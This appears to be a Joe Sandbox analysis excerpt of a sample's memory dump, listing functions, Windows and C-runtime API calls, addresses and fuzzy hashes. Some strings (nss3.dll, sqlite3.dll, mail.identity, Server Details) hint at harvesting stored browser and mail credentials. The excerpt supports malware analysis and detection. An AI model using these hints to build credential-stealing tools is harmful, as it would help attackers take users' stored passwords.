                                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                      • strftime.MSVCRT ref: 00411476
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                      • String ID:
                                                                                      • API String ID: 1886415126-0
                                                                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: strlen
                                                                                      • String ID: >$>$>
                                                                                      • API String ID: 39653677-3911187716
                                                                                      • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                      • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: @
                                                                                      • API String ID: 3510742995-2766056989
                                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strcmpi
                                                                                      • String ID: C@$mail.identity
                                                                                      • API String ID: 1439213657-721921413
                                                                                      • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                      • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00406640
                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset$memcmp
                                                                                      • String ID: Ul@
                                                                                      • API String ID: 270934217-715280498
                                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                      APIs
                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75920A60), ref: 00408EBE
                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408E31
                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                      • String ID:
                                                                                      • API String ID: 203655857-0
                                                                                      • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                      • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                      APIs
                                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                      Strings
                                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                      • String ID: recovered %d pages from %s
                                                                                      • API String ID: 985450955-1623757624
                                                                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _ultoasprintf
                                                                                      • String ID: %s %s %s
                                                                                      • API String ID: 432394123-3850900253
                                                                                      • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                      • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                      APIs
                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                      • String ID: menu_%d
                                                                                      • API String ID: 1129539653-2417748251
                                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                      APIs
                                                                                      Strings
                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _msizerealloc
                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                      • API String ID: 2713192863-2134078882
                                                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                      APIs
                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                      • String ID: _lng.ini
                                                                                      • API String ID: 3334749609-1948609170
                                                                                      • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                      • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                      APIs
                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                      • String ID: sqlite3.dll
                                                                                      • API String ID: 1983510840-1155512374
                                                                                      • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                      • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                      • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow
                                                                                      • String ID: MZ@
                                                                                      • API String ID: 1378638983-2978689999
                                                                                      • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                      • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                      • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                      • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                      APIs
                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID: A4@$Server Details
                                                                                      • API String ID: 1096422788-4071850762
                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID:
                                                                                      • API String ID: 438689982-0
                                                                                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                      APIs
                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,7508EB20,?,00000000), ref: 0040858F
                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,7508EB20,?,00000000), ref: 004085BA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3110682361-0
                                                                                      • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                      • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3510742995-0
                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                      APIs
                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset
                                                                                      • String ID:
                                                                                      • API String ID: 1860491036-0
                                                                                      • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                      • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                      • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                      • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                      APIs
                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                      • free.MSVCRT ref: 0040799A
                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,75920A60,00407A43,00000001,?,00000000,75920A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                      • free.MSVCRT ref: 004079BD
                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3669619086-0
                                                                                      • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                      • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59